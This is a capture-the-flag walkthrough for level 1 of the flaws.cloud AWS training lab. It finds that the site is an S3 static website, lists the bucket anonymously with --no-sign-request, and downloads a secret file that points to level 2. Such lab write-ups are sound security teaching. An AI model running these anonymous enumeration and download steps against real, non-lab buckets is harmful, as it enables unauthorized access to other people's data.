Level 1
A CTF walkthrough for level 1 of Flaws.Cloud
Discovering the S3 Bucket
Upon navigating to the challenge, flaws.cloud, we're provided a hint to get started.
This level is *buckets* of fun. See if you can find the first sub-domain.We can assume this website is hosted in an AWS S3 Bucket. Let's confirm!
nslookup flaws.cloud
Non-authoritative answer:
Name: flaws.cloud
Address: 52.218.178.42
[snip]nslookup 52.218.178.42
Non-authoritative answer:
42.178.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.Enumerating the S3 Bucket
Let's see if we can list the bucket contents.
We'll use --no-sign-request which basically means we're trying to access the bucket as an anonymous user.
aws s3 ls flaws.cloud --no-sign-request
2017-03-13 21:00:38 2575 hint1.html
2017-03-02 21:05:17 1707 hint2.html
2017-03-02 21:05:11 1101 hint3.html
2024-02-21 19:32:41 2861 index.html
2018-07-10 10:47:16 15979 logo.png
2017-02-26 18:59:28 46 robots.txt
2017-02-26 18:59:30 1051 secret-dd02c7c.htmlSkip the hints and we'll view the file secret-dd02c7c.html. This can be done in the browser but we'll view it in the terminal.
curl flaws.cloud/secret-dd02c7c.html
[snip]
Level 2 is at <a href="http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud">http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud</a>Nice! We've found the next entry point for Level 2.
Wrap-Up
In Level 1, we're provided with a website endpoint. After enumerating it, we discovered it's an AWS S3 static website. Further enumeration as an unauthenticated user leads to finding a new domain for Level 2.
While no sensitive data was found in this bucket, it's important to be mindful of what actions someone can perform. In this case, as an anonymous user, we can enumerate the full bucket contents and even download files locally e.g.,
aws --no-sign-request s3 cp s3://flaws.cloud/secret-dd02c7c.html .
download: s3://flaws.cloud/secret-dd02c7c.html to ./secret-dd02c7c.htmlLast updated
Was this helpful?